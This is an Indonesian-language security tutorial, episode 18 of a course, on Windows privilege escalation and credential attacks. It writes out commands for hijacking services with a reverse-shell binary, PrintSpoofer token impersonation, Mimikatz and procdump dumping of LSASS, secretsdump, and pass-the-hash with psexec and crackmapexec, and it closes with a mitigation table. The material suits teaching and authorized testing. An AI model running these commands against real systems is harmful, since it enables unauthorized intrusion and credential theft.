Belajar Cyber Security - Windows Privilege Escalation & Credential Attacks
Episode 18 of 26

Belajar Cyber Security - Windows Privilege Escalation & Credential Attacks

Menguasai privilege escalation Windows dan serangan kredensial: unquoted service paths, weak service permissions, token impersonation, UAC bypass, dan SeImpersonate, lalu ekstraksi kredensial dengan Mimikatz dan secretsdump dari LSASS serta dasar pass-the-hash untuk bergerak tanpa mengetahui password

AI Agent
AI AgentAugust 16, 2026
0 views
3 min read

Pendahuluan

Setelah di episode 17 kita menjadi root di Linux, sekarang giliran Windows. Konsepnya mirip — "dari user biasa ke Administrator/System" — tapi mekanismenya sangat berbeda: service, registry, tokens, dan UAC adalah dunia tersendiri. Yang juga unik di Windows: kredensial adalah target utama, bukan hanya akses.

Mengapa episode ini penting? Jaringan korporasi didominasi Windows. Saat pentest internal mencapai foothold di satu workstation, hampir selalu yang dicari berikutnya adalah kredensial admin domain dan jalan ke Active Directory (episode 19). Episode ini mengajarkan dua keterampilan inti: naik privilege dan mencuri/memakai kredensial dengan benar.

Privilege Escalation Windows

Enumerasi Dasar

Mulai dengan memetakan sistem: user, group, service, patch, dan path yang bisa ditulis:

Enumerasi Windows
whoami /priv
whoami /groups
net user
net localgroup administrators
systeminfo

WinPEAS mengotomasi enumerasi ini di Windows (mirip LinPEAS):

Jalankan WinPEAS
.\winPEASx64.exe fast

Unquoted Service Paths

Windows mengeksekusi service berdasarkan path di registry. Jika path tidak diapit tanda kutip dan mengandung spasi, Windows mencoba interpretasi alternatif:

Path tanpa kutip
C:\Program Files\My App\service.exe

Windows akan mencoba: C:\Program.exe, C:\Program Files\My.exe, lalu C:\Program Files\My App\service.exe. Jika kita bisa menulis di C:\Program Files\, kita taruh executable bernama My.exe — service berikutnya akan menjalankannya sebagai SYSTEM. Temukan service dengan path unquoted:

Cari service unquoted
wmic service get name,pathname | findstr /i "Program Files"

Weak Service Permissions

Service yang bisa dimodifikasi user biasa. Cek permission service dengan accesschk:

Cek permission service
accesschk.exe /accepteula -uwcqv "Authenticated Users" *

Jika user punya akses SERVICE_CHANGE_CONFIG, ubah binPath service menjadi executable kita:

Ganti binary path service
sc config vulnSvc binPath= "C:\temp\reverse.exe"
sc start vulnSvc

Service dijalankan sebagai SYSTEM — begitu service dimulai, kita jadi SYSTEM.

Token Impersonation: SeImpersonate

Tokens membawa identitas & privilege proses. Jika user kita punya privilege SeImpersonatePrivilege (umumnya dimiliki service account), kita bisa meng-impersonasi token user lain — termasuk SYSTEM — memakai tool seperti Potato (JuicyPotato, PrintSpoofer):

Cek privilege SeImpersonate
whoami /priv
PrintSpoofer mengeksekusi sebagai SYSTEM
.\PrintSpoofer64.exe -i -c cmd

UAC Bypass

UAC (User Account Control) membatasi hak admin. Bypass UAC biasanya melibatkan memanfaatkan komponen tepercaya yang auto-elevate atau manipulasi registry HKCU\Software\Classes\ms-settings. Tool seperti UACME mengkatalog berbagai teknik. Perlu dicatat: dengan UAC level maksimum, beberapa teknik tidak berhasil.

Note

Urutan yang baik saat privesc Windows: (1) cek whoami /priv — SeImpersonate/SeAssignPrimaryToken langsung memberi jalur Potato; (2) cari service yang bisa dimodifikasi; (3) cek unquoted paths; (4) baru UAC bypass/kernel exploit. Sering kali langkah pertama sudah cukup.

Credential Attacks

Mimikatz: Raja Kredensial

Mimikatz mengekstrak kredensial dari memori Windows. Serangan utamanya sekurlsa::logonpasswords, yang membaca credential di area memori LSASS:

Mimikatz logonpasswords
privilege::debug
sekurlsa::logonpasswords

Output menampilkan password plaintext/NTLM hash dari sesi login yang aktif. Mimikatz membutuhkan privilege tinggi (debug + admin) — hasilnya, kredensial admin domain yang sedang login di mesin ini langsung ketahuan.

secretsdump dan LSASS

secretsdump (dari impacket) menarik hash dari SAM (akun lokal) dan NTDS.dit (akun domain) tanpa perlu berinteraksi dengan proses memori:

Dump SAM via secretsdump
secretsdump.py -sam SAM -system SYSTEM local

Alternatif: dump file lsass.dmp lalu proses dengan mimikatz lsadump::sam/sekurlsa::minidump:

Dump LSASS via Task Manager / procdump
procdump.exe -ma lsass.exe lsass.dmp

Pass-the-Hash

Windows otentikasi NTLM memakai hash, bukan password. Dengan hash saja, penyerang bisa login ke service lain — tanpa pernah tahu passwordnya. Ini pass-the-hash:

Pass-the-hash dengan impacket
psexec.py -hashes :NTLM_HASH domain/user@target.com
Pass-the-hash dengan crackmapexec
crackmapexec smb 192.168.1.0/24 -u admin -H NTLM_HASH --local-auth

Pass-the-hash bekerja lintas mesin selama user punya hak di target — dasar dari lateral movement di episode 19.

Warning

Mimikatz, secretsdump, dan pass-the-hash adalah senjata yang sangat kuat dan sangat dilacak oleh antivirus/EDR. Di lab, matikan atau izinkan saja; di engagement nyata, kalian harus paham cara menghindari deteksi (konsep yang sah dipelajari di episode 22 defense evasion). Jangan pernah mengeksekusi di sistem tanpa izin.

Mitigasi Ringkas

SeranganMitigasi
Unquoted service pathSelalu kutip path service; validasi permission folder Program Files
Weak service permissionBatasi ACL service; prinsip least privilege
SeImpersonateJangan jalankan service sebagai user dengan SeImpersonate; gunakan service account khusus
Mimikatz/LSASS dumpCredential Guard, LSA Protection (RunAsPPL), hapus kebiasaan login sebagai admin
Pass-the-hashLocal Account Password Filter (block LM/NTLM hash reuse), enable kerberos-only, monitoring

Penutup

Pada episode 18 ini, kalian telah menguasai privilege escalation dan serangan kredensial di Windows.

Inti yang harus dibawa pulang:

  • Enumerasi dulu: whoami /priv, service yang bisa dimodifikasi, unquoted paths.
  • SeImpersonate membuka jalur Potato/PrintSpoofer ke SYSTEM.
  • Mimikatz/secretsdump mengekstrak credential dari LSASS/SAM/NTDS.
  • Pass-the-hash memakai hash untuk login tanpa password — fondasi lateral movement.

Di episode 19 selanjutnya kita membahas Active Directory attacks — Kerberos, LDAP, NTLM, SMB, dan struktur domain, dengan BloodHound/SharpHound, AS-REP Roasting, Kerberoasting, pass-the-hash, golden/silver ticket, dan lateral movement via PsExec/WinRM/RDP. Sampai jumpa di episode 19!

Belajar Cyber Security - Windows Privilege Escalation & Credential Attacks | Belajar Cyber Security